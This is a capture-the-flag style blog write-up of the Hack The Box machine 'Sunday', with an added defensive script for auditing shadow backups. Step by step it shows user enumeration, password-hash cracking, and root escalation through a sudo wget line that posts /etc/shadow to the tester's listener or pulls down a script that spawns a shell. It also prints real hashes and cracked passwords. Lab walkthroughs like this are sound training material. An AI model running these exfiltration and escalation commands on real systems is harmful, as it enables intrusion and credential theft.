Road to OSCP - Hack The Box Write Up - Sunday

22 February 2020

Hack the Box is an online platform to test and advance your skills in penetration testing and cyber security.

In this series of articles we will show how junior evaluators complete some Hack The Box machines on their road to OSCP, a well-known and respected certification that many top cybersecurity positions require. Certified OSCPs are able to identify existing vulnerabilities and execute organized attacks in a controlled and focused manner. They can leverage or modify existing exploit code to their advantage, perform network pivoting and data exfiltration, and compromise systems that suffer from poor configuration.

Let's start with the fun!

Sunday

Initial Foothold

The initial nmap scan shows a finger service, which is used to query information about users on the box. We can leverage this service to enumerate valid users. For that, we can use a script from pentestmonkey called finger-user-enum.

The script can be used with a wordlist. Taking a stroll through the wordlists from SecLists, I think that we have the best chance with names.txt.

perl finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76

We find the following valid usernames:

  • access
  • admin
  • line
  • message
  • sammy
  • sunny

The question is, where do we log in? After doing a full nmap scan, we discover that port 22022 is actually an SSH service: SunSSH 1.3 (protocol 2.0).

If we try to ssh in as any user, we get the following error:

Unable to negotiate with 10.10.10.76 port 22022: no matching key exchange method found. Their offer: gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1

StackOverflow to the rescue: the legacy key exchange method can be re-enabled on the client side.

ssh admin@10.10.10.76 -oKexAlgorithms=+diffie-hellman-group1-sha1 -p 22022

Lucky guess: the user is sunny and the password is sunday (the name of the box). Alternatively, we could have used hydra to brute-force it.

User

Doing sudo -l shows that we can run /root/troll as root with no password. Unfortunately, it looks like the binary does not do anything useful for us.

Running lse.sh did not help much. It looks like we have to enumerate manually.

After taking a stroll through the file system, we find /backup, which contains shadow.backup (because why not...).

shadow.backup

mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

From that file, we can get the password hash for the user sammy. Cracking it with john and the rockyou.txt wordlist yields sammy's password: cooldude!.

We can now ssh in as user sammy.
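Read from the defender's side, the lesson of this step is that a stray shadow backup hands over everything needed for offline cracking. The audit script below is an added example and is not part of the original write-up: it parses Solaris-style shadow entries (locked *LK* accounts, Solaris NP entries and $id$ crypt hashes), decodes the last-change day count, and reports which accounts' passwords must be rotated because their hashes were exposed. The sample entries are constructed to mirror the file shown above.

```python
"""Audit a Solaris-style shadow(4) backup: which entries leaked a real password hash?"""
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Optional

# Constructed sample in the same layout as the shadow.backup shown above
SAMPLE = """\
mysql:NP:::::::
openldap:*LK*:::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
"""

# crypt(3) scheme identifier sits between the first two '$' of a hash
HASH_IDS = {"1": "md5-crypt", "2a": "bcrypt", "5": "sha256-crypt", "6": "sha512-crypt"}

@dataclass
class Entry:
    user: str
    status: str              # "locked", "no-password", "hashed" or "unknown"
    algo: Optional[str]      # crypt scheme name when status == "hashed"
    lastchg: Optional[date]  # field 3: days since 1970-01-01 of the last change

def parse_entry(line: str) -> Entry:
    """Parse one name:password:lastchg:min:max:warn:inactive:expire:flag line."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 2:
        raise ValueError(f"malformed shadow line: {line!r}")
    user, pw = fields[0], fields[1]
    lastchg = None
    if len(fields) > 2 and fields[2].isdigit():
        lastchg = date(1970, 1, 1) + timedelta(days=int(fields[2]))
    if pw.startswith("*LK*") or pw in ("*", "!", "!!"):  # locked, nothing to crack
        return Entry(user, "locked", None, lastchg)
    if pw == "NP":  # Solaris: no password set, password authentication impossible
        return Entry(user, "no-password", None, lastchg)
    if pw.startswith("$") and pw.count("$") >= 3:
        scheme = pw.split("$")[1]
        return Entry(user, "hashed", HASH_IDS.get(scheme, "unknown:" + scheme), lastchg)
    return Entry(user, "unknown", None, lastchg)

def audit(text: str) -> dict:
    """Group users by status; every 'hashed' user has a leaked, offline-crackable hash."""
    groups = {"hashed": [], "no-password": [], "locked": [], "unknown": []}
    for line in text.splitlines():
        if line.strip():
            e = parse_entry(line)
            groups[e.status].append(e.user)
    return groups
```

Running audit() over a real backup found during a review gives the list of accounts whose passwords must be changed and the backup file itself flagged for removal.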

Root

Running lse.sh again shows that we can run wget as user root with no password.

A quick search on GTFOBins gives us the way to escalate privileges.

  1. Run the listener on Kali: ncat -lnvp 6969 > shadow.
  2. Exfiltrate file: sudo /usr/bin/wget --post-file=/etc/shadow http://10.10.14.13:6969

Could not crack root's password, so I just exfiltrated root.txt instead.

Bonus

After watching Ippsec's video on this box, it turns out that you can use wget to overwrite the /root/troll file with a script that just runs bash, and then execute it as the user sunny.

scuffed_privesc

#!/bin/bash
bash

  1. As user sammy: sudo wget 10.10.14.13:8000/scuffed_privesc -O /root/troll.
  2. As user sunny: sudo /root/troll.

Note: The file /root/troll is re-written every 5 seconds, so the attack has to be quick.

Ángel Guzmán / Junior evaluator

Degree and Master in telecommunications from the University of Granada, specialized in telematics. Joined jtsec in November 2019 as a Junior cybersecurity evaluator.

Since he joined jtsec, he has participated in several internal hardware hacking projects, while also receiving training about the LINCE certification.

His main motivation is to learn, from small tools for his daily work to new technologies.
